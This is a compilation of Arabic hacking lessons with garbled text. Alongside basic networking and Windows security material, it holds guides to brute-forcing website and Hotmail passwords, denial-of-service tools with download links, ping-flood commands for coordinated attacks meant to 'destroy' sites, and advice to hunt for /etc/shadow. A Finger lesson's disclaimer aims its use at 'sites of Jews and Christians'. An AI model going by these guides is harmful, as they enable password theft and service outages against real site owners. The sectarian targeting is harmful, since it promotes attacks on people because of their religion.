كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر.أنظر الصورة.
في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ،و يكفي أن
يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و
التصاريح المتوفرة له ،و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل
مستخدم.
عند إدخال السم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات Security
(Accounts Manager (SAMفإذا كان الولوج الى جهاز Workstationفإن المعلومات يتم
مقارنتها مع قاعدة بيانات حسابات المن المحلية في الجهاز ،أما إذا كان الولوج الى نطاق Domainفإن
المعلومات يتم إرسالها الى مزود SAMالذي يقارنها مع قاعدة بيانات حسابات النطاق ،فإذا كان اسم
المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام ،أما إذا كانا صحيحين فإن
20
نظام المن الفرعي يقوم بإصدار بطاقة ولوج Access Tokenتعرف النظام بالمستخدم فترة ولوجه و
تحتوي هذه البطاقة على المعلومات التالية:
-1المعرف المني (Security Identifier (SIDو هو رقم فريد خاص بكل حساب.
-2معرفات المجموعة Group SIDsو هي التي تحدد المجموعة التي ينتمي لها المستخدم.
كما أنه يتم إصدار Access Tokenعند محاولتك التصال من جهازك بجهاز آخر على شبكتك و يطلق
على هذا الجراء الولوج عن بعد .Remote Logon
من المور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و
محركات القراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لستخدام هذه الموارد.
يمتلك كل مورد من الموارد قائمة تحكم بالوصول (Access Control List (ACLو كل معلومة يتم
إدخالها في ACLيطلق عليها .(Access Control Entry (ACE
يتم إنشاء ACEعند منح التصريح لستخدام المورد و تحتوي على SIDللمستخدم أو مجموعته الممنوحة
التصريح بالضافة الى نوع التصريح ،فلو افترضنا أن مدير مجموعة ما قد ُمنح تصريح قراءة و تصريح
كتابة لملف ما فإن ACEجديد يتم إنشاؤه ثم إضافته الى ACLالخاص بالملف و سيحتوي ACEعلى
SIDلمدير المجموعة بالضافة الى تصريح قراءة و تصريح كتابة.
-2الوصول ممنوع AccessDeniedو يتم إنشاؤها إذا كان تصريح الوصول هو .No Access
و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة SIDالخاص به مع SIDsفي كل ACE
من ACLللمورد.
في ويندوز NTو ويندوز 2000يتم ترتيب ACEبحيث تكون AccessDenied ACEsقبل
، AccessAllowed ACEsفإذا وجد SIDخاصتك في أي من AccessDenied ACEs
فستمنع من الوصول الى المورد و إل فسيبحث في AccessAllowed ACEsللتأكد من الحقوق
الممنوحة لك فإن لم يعثر على SIDمطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد.
ملخص الدرس:
21
هناك بعض الجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها:
تدريب المستخدمين ،حماية المعدات ،تشفير البيانات ،استخدام أجهزة عديمة القراص ،مراقبة العمليات
التي تجرى على الشبكة.
-2تصاريح الوصول.
انتهى،،،
22
>ةةةةة<
>ةةةةةة<BeReal :
السلم عليكم
لقد اعددت هذا الملف لخواني المبتدئين في تعلم طرق اختراق المواقع ،فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ل يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم .فال الموفق.
===========================================================
==========
أو وضعيته تكون دائما كزبون .أي أن باستطاعة هذا البرنامج التصال بالسيرفر
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ،و للتصال بالسيرفر
عبر بورت معين و خصوصا بورت الف تي بي ) (21للدخول الى الموقع بطريقة خفية
لستخدام البرنامج ،اذهب الى Start ==> Run ==> telnetو ستظهر شاشة التلنت.
------------------------------------------------------------------------
ثغراتهاإن وجدت ،فهي سريعة ،كما أنها تملك قاعدة بيانات واسعة و كبيرة
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ل .و من أمثلة
، Scannerالخ .
و لهذه البرامج أنواع مختلفة ،منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IISو منها برامج المسح
23
-----------------------------------------------------------------------
اكسبلويت ) -:(Exploitsهي برامج تنفيذية تنفذ من خلل المتصفح .و لها عنوان
، URLتقوم هذه الكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ،كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ،و هذا ما يسمى بـ . Buffer Over Flow Exploits
ال Unicodes Exploitsو منها ال ، Buffer Over Flow Exploits ،و منها
ال ، PHP Exploitsو منها ال DOS Exploitsو التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول . Fire Wallو هناك بعض الكسبلويتات المكتوبة بلغة السي و يكون
أي الكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلل المتصفح ،و لتحويل
الكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ،نحتاج إما الى
نظام التشغيل لينوكس او يونكس ،او الى اي كومبايلر يعمل ضمن نظام التشغيل
Borland C++ Compilerو هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
----------------------------------------------------------------------
الغير شرعي لنظام ملفاتها من قبل المتطفلين .هي تمثل الحماية للسيرفر طبعا ،
----------------------------------------------------------------------
24
-:Tokenهو ملف الباسورد المظلل ) (Shadowed Passwdو الذي يكون فيه الباسورد
على شكل * أو xأي . Shadowedإن وجدت ملف الباسورد مظلل ،فيجب عليك حينها
البحث عن ملف الباسورد الغير المظلل و الذي يسمى . Shadow fileتجده في
. etc/shadow/
----------------------------------------------------------------------
-:Anonymouseهي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
----------------------------------------------------------------------
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
الغير مؤمن بشكل سليم .و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
----------------------------------------------------------------------
: passwd fileهو الملف الذي يحتوي على باسورد الروت و باسوردات الشخاص
المصرح لهم بالدخول الى السيرفر .باسورد الموقع موجود في نفس الملف طبعا.
----------------------------------------------------------------------
25
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
----------------------------------------------------------------------
السيرفر :Serverهو الجهاز المستضيف للموقع ،اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ،و هو متصل بالنترنت 24ساعة ،و هذا هو سبب كون
المواقع شغالة 24على النترنت . (:قد يملك و يستضيف السيرفر أكثر من موقع
واحد ،و هذا يعتمد من سيرفر لخر و من شركة لخرى .ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ،فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ،و هذا ما يحدث للمواقع
-----------------------------------------------------------------------
بوفر أوفر فلو ) : ( Buffer over Flowو هي نوع من أنواع الكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الف تي بي
أو غيره لجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و للغاء الرقعة
الموجودة بها كي يتم استغللها مجددا -بعد عمل الكراش لها طبعا -يتم استغللها
في معاودة التصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS -اذ أنها تقوم بعملية اوفر لود على
انتهى،،،
الختراق للمبتدئين:::
26
في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد
اعتمادًا كليًا على برامج التخمين .وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم
البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد
ذلك يسيطر المخترق على الموقع .لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباليام
وهي مكلفة ماديا لن الجهاز سيبقى متصل طوال الوقت بالنترنت حتى يتم اكتشاف كلمة السرالصحيحة.
انتهى،،،
27
>ةةةةةة :ةةةةةة<
مرحبا شباب
انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه ....احب اقول
انه واحد من اقوى البرامج لاختراق المواقع وانا من الشخاص الذين يعتمدون عليه
الشرح ...
28
29
وهذي وصلة البرنامج
http://www.dunbell.freeserve.co.uk/webcrack40.zip
،،،انتهى
30
>ةةةةة<
فى 2تضغط BROWSEو تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها
فى 3تضغط على BROWSEايضا و تضع القائمه الخاصه بسرفر اليميل الذى ستخترقه )اذا كان فى
الهوت ميل تضع قائمه الهوت ميل .....الخ(
31
فى 5يعرض الباسوردس التى يجربها الن )فى وقت الهكر(
فى 6يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى
نضع علمه صح امام 10حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده التصال يستمر فى
التجربه و ل يبدا من الول
عند و ضع العلمه على 11ل يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم 6
نضع علمه صح امام 12حتى ل يجرب البرنامج الكلمات التى تحتوى على مسافات
عند وضع العلمه على 13ل يجرب البرنامج الكلمات التى اقل من خمس احرف )مطلوب فى الهوت ميل(
و عند وضع العلمه ايضا على 14ل يجرب البرنامج الكلمات التى هى اكثر من عشره احرف
انتهى،،،
32
>ةةةةةة :ةةةةةة<
أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع ولسيما أنه قوي جدا في إرسال طلبات وسريع ..
Scree Shot
--------------------------------------------------------------
--------------------------------------------------------------
في غاية البساطة فقط قم بإنشاء ملف txtيعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملف
كبير شوي وبتعدى Kb 10بعدين احفظه
وبعد كذا قم بتشغيل winsmurf
واستعرض الملف ...
وصلة البرنامج..
http://www.planet-eagle.de/files/WSmurf.zip
انتهى،،،
33
.استخدامه من قبل 200شخص على القل في نفس الوقت على نفس الموقع لينجح التدمير بإذن ال عزوجل
،،،انتهى
>ةةةةة <
34
عند النتهاء من تحميل البرنامج ,فك ضغط الملف ,و عند تشغيله سيظهر لك الشكل التالي :
عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه.
35
وسيكون عنوان الموقع المراد الهجوم عليه هنا
و من خواص هذا البرنامج انه ل يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه
و هو سيقوم تلقائيا بالبحث و التغيير. فقط قم بضغط
و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجاح بقصفها فقط قم بضغط :
و لعمل البرنامج بطريقة ذكية بحيث ل يبطيء النترنت ,قم بتشغيل :
36
الشكل التالي يمثل عدد المرات الناجحة :
http://www.geocities.com/boom_q8y4/dorrah.zip
،،،انتهى
37
في هذا الدرس سأقوم بشرح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد
...كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت
::الطريقة الولى
Ping www.xx.com
مثال ذلك:
الطريقة الثانية::
ping -t ip
انتهى،،،
38
بعد قراءة هذا الموضوع ستكون قادر على
تسمح لمستخدمين عميل التلنت بالتصال بكمبيوتر يشغل خدمة التلنت2000 خدمة التلنت في ويندوز
ويمكن أن تكون خدمة التلنت عبارة لتصال، وإستعمال سطر الوامر ويصبح كما لو كان يجلس أمامه
المستخدمين مع بعضهم البعض
عميل تلنت في أي وقت63 وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى
Telnet Authentication
You can use your local Windows 2000 user name and password or
domain account information to access the Telnet server. The security
scheme is integrated into Windows 2000 security. If you do not use the
NT LAN Manager (NTLM) authentication option, the user name and
password are sent to the Telnet server as plain text.s 2000 security
context for authentication and the user is not prompted for a user
If you are using NTLM authentication, the client uses the Windowname
يمكن استعمال.and password. The user name and password are encrypted
إذا كنت تستخدم خيار التحقق من، اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت
سيرسل السم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عاديNTLM الصحة
ملحظة
If the User Must Change Password At Next Logon option is set for a
user, the user cannot log on to the Telnet service when NTLM
authentication is used. The user must log on to the server directly and
إذا كان هذا.change the password, and then log on through the Telnet client
الخيار منشط في خصائص كلمة المرور لحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند
يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنتNTLM إستخدام
39
مكان التلنت
You can also start or stop the Telnet service from a command prompt.
To start Telnet Server, type net start tlntsvr or net start telnet at the
command prompt, and then press Enter. To stop Telnet Server, type net
stop tlntsvr or net stop telnet at the command prompt, and then press
.Enter
You can use the Telnet Server Admin utility to start, stop, or get
information about Telnet Server. You can also use it to get a list of
current users, terminate a user's session, or change Telnet Server
لتشغيل أو إيقاف أو الحصولTelnet Server Admin يمكن إستخدام الداة.registry settings
على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من
إنهاء التصال و تغير العدادات
الموجودةTelnet Administration Tool أضغط على, Telnet Server Admin لفتح الداة
إذا كنت ل.OK ثم,tlntadmn اكتب,Run ثم,Start أو اضغطAdministrative Tools في
.(Adminpak.msi) تحتاج إلى تثبيت أدوات الدارة, Telnet Server Admin تستطيع فتح الداة
إصطياد المشاكل
يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت
40
الحل السبب رسالة الخطاء
راجع الخيارات وأعد كتابة خيارك القيمة المكتوبة لم تكن مقبولة Invalid input
شغل خدمة التلنت خدمة التلنت غير مشتغلة Failed to open the
registry key
شغل الخدمة خدمة التلنت غير مشتغلة على الملقم Failed to query the
registry value
عميل التلنت
The Telnet client uses the Telnet protocol, part of the TCP/IP suite of
protocols, to connect to a remote computer over a network. The Telnet
client software allows a computer to connect to a remote server. You
can use the Telnet client provided with Windows 2000 to connect to a
remote computer, log on to the remote computer, and interact with it as
.if you were sitting in front of it
إستعمال التلنت
To display help for Telnet, type help at the Microsoft Telnet command
prompt. To connect to a site, type open <computer_name> where
<computer_name> is the IP address or host name of the computer
.running the Telnet service
41
تمرين ضبط وإتصال بخدمة التلنت
في هذا التمرين يجب أن يكون لديك شبكة على القل جهازين متصلين مع بعضهم البعض
وسنفترض أن خدمة التلنت مثبته على Hishem2ثم سنقوم بالتصال من Hishem1إلى Hishem2
42
ملحظة
اترك هذا التصال نشط ل توقفه سننتقل الن إلى جهاز Hishem2لمشاهدة جلسة التلنت
من جهاز Hishme2سنراقب خدمة التلنت ثم نوقف ونقطع التصال من العميل Hishem1
اكتب 1لمشاهدة جميع التصالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين
NORورقم IPونوع التصال ووقت الدخول
43
تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله
اكتب 1هذا رقم المستخدم في القائمة ول يوجد معنا في المثال غير و احد لذالك تكتب 1
إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف
الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي
من Startثم Runثم تكتب Telnet pop.mail.yahoo.com 110طبعا إذا كان حسابك مع
الياهو أو اكتب الحساب الخاص بك مع ملحظة وجود فراغ بين الكلمة الولى و الجملة الثانية و الرقم
ستظهر لك نافذة مثل الدوس اكتب userثم اكتب بعدها اسم المستخدم في بريدك مع ملحظة أن الذي
ستكتبه ل تشاهده على النافذة ل تهتم مثل user xxxxثم إنتر
بعد ذلك اكتب passثم اكتب الرقم السري مثل pass xxxxثم إنتر
ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة
44
لحذف رسالة من القائمة اكتب deleثم رقم الرسالة الهدف
بناء الجملة
المعلمات
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
Port
تحديد المنفذ الذي تريد استخدامه .إن لم تحدد منفذًا ما ،سيتم افتراض المنفذ الفتراضي.
ملحظات
أمثلة
بناء الجملة
[close [\\RemoteServer
المعلمات
45
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
ملحظات
أمثلة
بناء الجملة
المعلمات
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
ao
ayt
esc
ip
synch
46
بناء الجملة
display
المعلمات
بل
ملحظات
يسرد المر displayمعلمات التشغيل الحالية لعميل .Telnetإذا كنت في جلسة عمل ) Telnetبعبارة
ل بملقم ،(Telnetيمكنك الخروج من جلسة عمل Telnetلتعديل المعلمات بضغط أخرى ،إذا كنت متص ً
.[+CTRLللعودة إلى جلسة عمل ،Telnetاضغط .ENTER
بناء الجملة
المعلمات
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
start
stop
pause
continue
ملحظات
ل من جهازييمكنك إدارة كمبيوتر عن بعد يشغل ملقم Telnetباستخدام الوامر tlntadmnإذا كان ك ً
الكمبيوتر يشغلن نفس نظام التشغيل فإذا المطلوب ويندوز 2000استخدمه بي ويندوز .2000ل يمكنك
47
استخدام الوامر tlntadmnلدارة كمبيوتر عن بعد يشغل Windows 2000وملقم Telnetمن
ل.
كمبيوتر يشغل Windows XPمث ً
لتعيين الحد القصى لعدد التصالت على كمبيوتر يشغل ملقم Telnet
بناء الجملة
المعلمات
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
maxconn=PositiveInteger
تعيين العدد العظمي للتصالت .يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من 10
مليين.
لتعيين العدد العظمي لمحاولت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم Telnet
بناء الجملة
المعلمات
\\ RemoteServer
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
maxfail=PositiveInteger
تعيين الحد القصى لمحاولت تسجيل الدخول الفاشلة المسموح بها للمستخدم .يجب عليك تحديد هذا العدد
بواسطة عدد صحيح موجب أصغر من .100
لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم Telnet
بناء الجملة
المعلمات
\\ RemoteServer
48
تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقمًا ما ،سيتم افتراض الملقم المحلي.
timeout=hh:mm:ss
انتهى،،،
=========================
ما هو ال ?DNS
49
==============
اول DNS :هو اختصار لكلمه . Domain Name Systemو يتصل سرفر ال DNSعادتا على
بورت 53مما يعنى انك اذا اردت التصال الى احد المواقع و استعملت ال DNSحقه فسوف تتصل
به عن طريق البورت 53و سوف يترجم او يحول ال translates alphabetical hostnamesو
يعنى اسم الموقع مثل /http://www.burn.com :الى IP ADRESSESمثل 127.0.0.1و
العكس صحيح و عندما تتم العمليه
تتصل بالموقع مباشره
و عمليه التحويل هذه تسمى address resolutionاى تحويل او تحليل عنوان الموقع الى IPاو
العكس لنستطيع التصال به
و قبل ظهور ال DNSكان اسم اخر لعمليه ال . address resolutionو لكن قد ظهر ال DNSلجعل
توزيع الهوستس اسهل بكثير من الماضى حيث انه من
السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الرقام ). (IP
و كان السم المستعمل ل ال address resolutionقبل ال DNSكان يتكون من ملف اسمه ال
HOST FILEو كان عباره عن اسماء الهوستس اى المواقع
و عنواوين ال IPالخاصه بهم و كان هذا الملف تتولى رعايته Stanford Research Institute's
.(Network Information Center (SRI-NICو كان على هذا الراعى ان
يجدد ) (UPDATEالجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الرقام التى ظهرت و على
السيستم ادمين ان يجدد هو الخر ملفه او
عن طريق اتصال ال FTPبينه و بين الراعى اى .SRI-NIC
و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام المثل الذى
يستطيع التحكم فى الهوست و الى بى
معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال DNSليفعل ذلك.
و ال DNSليس له مركز اى decentralizedاى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل
ال DNSبل بالعكس فال DNSعباره عن داتا بيز
موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه DNSيعرف اين يبحث عندما يريد ان
يحصل على معلومه معينه او هوست معين.
هذا بالنسبه لمعلومات عامه عن ال DNSو كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه
النترنت القديمه .
50
المحلى اى الخاص بك سوف يسأل ال DNS SERVERالعلى منه فى المستوى عنه ليجده و اذا لم يجده
فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من القل الى العلى فى
مستويات ال .DNS SERVERS
و طبعا نتيجه من هذا التصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط
دعونا نأخذ مثال :
لو فرضنا ان ال ISPالخاص بك كان مثل isp.co.ukو هذا يعتمد على اتصالك بالنترنت اى حسب
الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ISP's DNS server's
hostnameمثل هذا dns.isp.co.ukو الن فالنفرض انك سألت هذا ال DNSليبحث لك عن IP
الخاص ب /http://www.burn.comمثل فسيقوم هذا ال dns.isp.co.ukبالبحث فى جداوله
المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال DNS
SERVERليبحث فيه و اذا لم يجده ايضا فى المستوى العلى فعليه ان يقوم بتغيير مكان البحث كليا فمثل
من dns.isp.co.ukالى some-organization.org.ukاو school.edu.uk,
university.ac.uk, england.gov.uk, airforce.mil.ukو الخ و هناك امثله كثيرا طبعا و كل
شئ ينتهى ب UKو اذا لم يجده ايضا فى كل الماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبر
DNSموجود على الشبكه و اسمه ال ROOTفهو يحتوى على كل عناوين ال IPعلى كل للمواقع
الموجوده على اى .DOMAIN NAME
ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا
اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم
المواقع و معرفه كل شئ جديد فى عالم النترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح
الخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الخطاء و نتظر ردودكم و تفاعلكم مع
المعلومات و اى سؤال انا موجود على قد مقدرتى
و انتظرو موضوعى القادم و هو معلومات عن ال SSLو سنعرف ما هو بالتفصيل
و السلم عليكم و رحمه ال و بركاته.
انتهى،،،
51
" معلومات عن " Routing in the Internet
52
و يعتبر الول فى هذه الشياء هو المهم عندما تنتقل داتا ال ipمن الكمبيوتر.فمن الدرورى ان نغلف هذه
الداتا الخاصه بال ipبأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل
بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا.و يتطلب هذا الغلف التضمين من ال عنوان النت
ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الطار الذى يحيط بالبيانات اى )inclusion of a
.(local network address or physical address within the frame
و الشئ الثانى من المذكور اعله مهم ايضا و درورى لن النترنت تتكون من عدد من النت وركس المحليه
اى local networksمربوطه بواحد او كثير من المداخل اى ال .gatewaysو هذه المداخل عموما
تسمى بالروترس اى ال , routersاحيانا يكون لها اتصالت فيزيائيه او بورتات مع الكثير من النت
وركس .و تحديد المدخل الملئم و البورت لتفصيل داتا ال ipهذا ما نسميه روتنج اى routingو تتضمن
ايضا داخل تبادل المعلومات بطرق معينه.
و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال address translationمن الشكل الكتابى
الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثل عنوان المتصفح اى
/http://www.burn.comالى ipاى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال
) DNSارجو مراجعه موضوعى الول عن ال DNSللستفاده اكثر (.
و للحصول على الجدول نستخدم امر arp -aو فى اليونكس ايضا نستخدم نفس المر.
و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ المر :
C:\WINDOWS>arp -a
النترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى النترنت
و ال Physical Addressاعتقد انكم تلحظون انه ثابت ل يتغير و بهذا يمكننا ان نقول و نوضح لكم ان
ال Physical Addressهذا هو ال Mac Addressاى رقم الجهاز نفسه الذى تتصل به النتوركس
اثناء العمل و لذلك فقد قلت فى كلمى ان تحديد ال Physical Addressمهم جدااا فى عمليه نقل
معلومات او داتا ال ipلنه بدون Physical Addressاذن فكيف ستتعرف الباكيدجس الموجوده فى ال
routerعلى طريقها.
و ال typeهذا مكتوب dynamicاى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى
الجهاز و لكنه يثبت اثناء العمل على النترنت .
53
و هناك النوع الخر و هو ال staticاى الثابت الذى ل يتغير "هذا فقط للتوضيح"
انتهى،،،
يوجد في العداد الفتراضي للويندوز اعتماد على NetBIOSوهي مشكلة كبيرة لصحاب الشبكات المهمة لن الـ
NetBIOSلها واجهات تداخل APIتعيد وترجع معلومات حول الهدف من خلل المنفذ 139لـ ، TCPوفي الحالة
الفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ،وطبعا هذا يكون فيه خطرًا قد يكون كبير عند استخدامه من
محترفين الولوج على أنظمة NT
تستطيع أن تلغي كل خدمات NetBIOSعلى جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص TCP/IPثم من
Advancedثم من التبويب WINSثم تعلم على الخيار الواضح في المثال التالي
54
ل مناسبًا وهى تدعى RestrictAnonymousوهي تحد بشكل كبير وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت ح ً
من تسرب المعلومات عبر الوصلت المجهولة ،وتستطيع الوصول إليها من Administrative TOOLSثم من Local Security
policyثم من النافذة نختار Local poiciesثم من security optionsثم نعلم على الخيار الول Additional restrictions
for anonymous connectionsثم بالزر اليمن نختار securityثم من النافذة نختار من الشريط المنزلق الخيار No Access
Without Explicit Anonymous Permissionsمثل المثال
هذه الداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على NT/W2000وهي تعرض الميادين المتاحة وكل الجهزة على
هذه الميادين وكل الخدمات المتاحة لتشارك على الجهزة ،ويكفي أن تكتب عنوان IPأو اسم الدومين حتى تكون قد حصلت على ما
تريد
وتوجد بعض الدوات المتاحة على النترنت تقوم بنفس العمل بشكل احترافي منها هذه الداة المدعوه Nbtscanوهي أيضًا اداة سطر
أوامر وتستطيع أن تحملها من ...
وتوجد أدوات رسومية شعبية كثيرة على النترنت للقيام بنفس العمل منها على سبيل المثال البرنامج ، Legion
55
الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول TCPو البروتوكول UDPعبر المنافذ من 135إلى
المنفذ ، 445+ 139وكل برامج الجدران النارية المتقدمة تستطيع من خللها أن تتحكم بالمنافذ بشكل مريح ،وشاهدنا كيف نلغي
الخدمة NetBIOSأو نقلل من المشاكل المحتمله منها ،ورغم كل ذلك لزال الخطر موجودًا إذا كنت تستخدم البروتوكول SNMP
لدارة الشبكة على ويندوز 2000سيرفر ،فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ،ولتأمين هذا البروتوكول بالشكل
المطلوب أمامك خيارين الول
حذف اسم المجموعة Publicالتي تكون عند التثبيت الفتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال
المجموعة publicموجودة علم عليها ثم من الزر Removeثم حرر المربع Send authentication trap
HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent
البروتوكول TCP/IPيستطيع العمل بشكل سليم بدون خدمات الـ ، NetBIOSلذلك إذا كنت
هل تعلم أن
غير محتاج إليه تعطيله أفضل
ةةةةةةةة
56
" بروتوكول خدمة "Finger
>ةةةةةة<LAMeR :
1.1تبرئة
1.2مقدمة عن Finger
1.3استخدام Finger
1.4بعض الخدع عند استخدام خدمة Finger
1.5الستعلم عن طريق موقع بأستخدام Finger
1.6الستنتاج من هذا الدرس
1.7الختام
1.1تبرئة:
>=========<
هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين
فالكاتب ل يتحمل اي مسؤولية للستخدام السيء لهذا الدرس ضد أخواننا المسلمين.
1.2مقدمة عن Finger
>===================<
ن Fingerديمون خدمة تعمل عن طريق البورت 79عادة وكانت
إّ
مستخدمة أصل كنوع businesscardرقمي للناس.
